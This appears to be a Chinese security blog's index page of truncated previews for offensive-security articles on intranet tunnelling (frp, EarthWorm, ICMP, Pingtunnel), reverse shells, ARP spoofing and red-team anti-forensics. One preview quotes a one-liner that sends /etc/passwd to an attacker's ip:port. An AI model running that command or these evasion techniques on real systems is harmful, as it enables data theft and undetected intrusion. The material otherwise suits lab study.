今天实践的是vulnhub的Durian镜像,下载地址,https://download.vulnhub.com/durian/Durian.ova,用workstation导入,做地址扫描,159就...
内网渗透之流量代理(frp)
通常我们拿到shell之后扫内网之后,要进行目标机器的服务进行访问 的,这就需要把内网的流量代理到外网出来,也就是常说的内网穿透2.概况上传 目标机 frpc.exe 、frpc....
渗透小技巧从getshell到3389端口远程桌面连接靶机
最近更新了一些cobaltstrike和内网的知识,很多兄弟私信说是对这类感兴趣作者: zangcc1、靶场环境1、靶机和攻击机的信息攻击机:kali-192.168.25.130靶机:win7-19...
反弹Shell,看这一篇就够了
免责声明由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即...
后渗透及内网初体验的总结
绕php的disable_functions此处建议用AntSword的官方绕过插件全自动绕绕过失败的可以手动试一下:https://github.com/AntSwordProject/AntSwo...
奇淫技巧:linux下无回显可将回显发送到服务器
靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...
红队笔记|反溯源技术在攻防实战中的应用
反溯源是攻防过程中的重要一环,其主要目的为防止防守方快速找出屏幕后,正在抠脚的你。渗透过程中有没有"事了拂衣去"的洒脱,很大程度在于过程中反溯源技术的应用程度。下文为笔者对于溯源技术总结。主机加固术理...
甜橙安全头条第23期|技术干货之透析中间人攻击
作者:甜橙安全团队中间人攻击是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。中间人攻击之ARP欺...
ICMP隧道攻击
ICMP隧道攻击ICMP隧道模式简介ICMP一般用于检测网络的可通性, 所以一般在防火墙设备上都不会用策略去禁止它(ping),这也就使得了有很大的可能性去使用ICMP隧道进行相应的攻击,达到一种伪装...
内网穿透之EarthWorm
何必择地?何必择时?但问立志之真不真尔?一个资质平庸却努力上进的普通人,我希望,当我回首往事时,不因虚度年华而悔恨,也不因碌碌无为而羞愧,我可以对自己说:我,不负此生。0x00 前言构建内网隐蔽通道,...
ARP欺骗与攻击工具使用
一、使用“P2P终结者”工具进行ARP欺骗攻击实验环境:这里我用Windows 7做攻击机,Windows server 2003做受害者机。要实现ARP欺骗攻击的条件是攻击机与受害者机一定要在同一个...
Pingtunnel隧道介绍
pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具。用于突破网络封锁,或是绕过WIFI网络的登陆验证,或是在某些网络加快网络传输速度。Pingtunnel隧道具有功...
6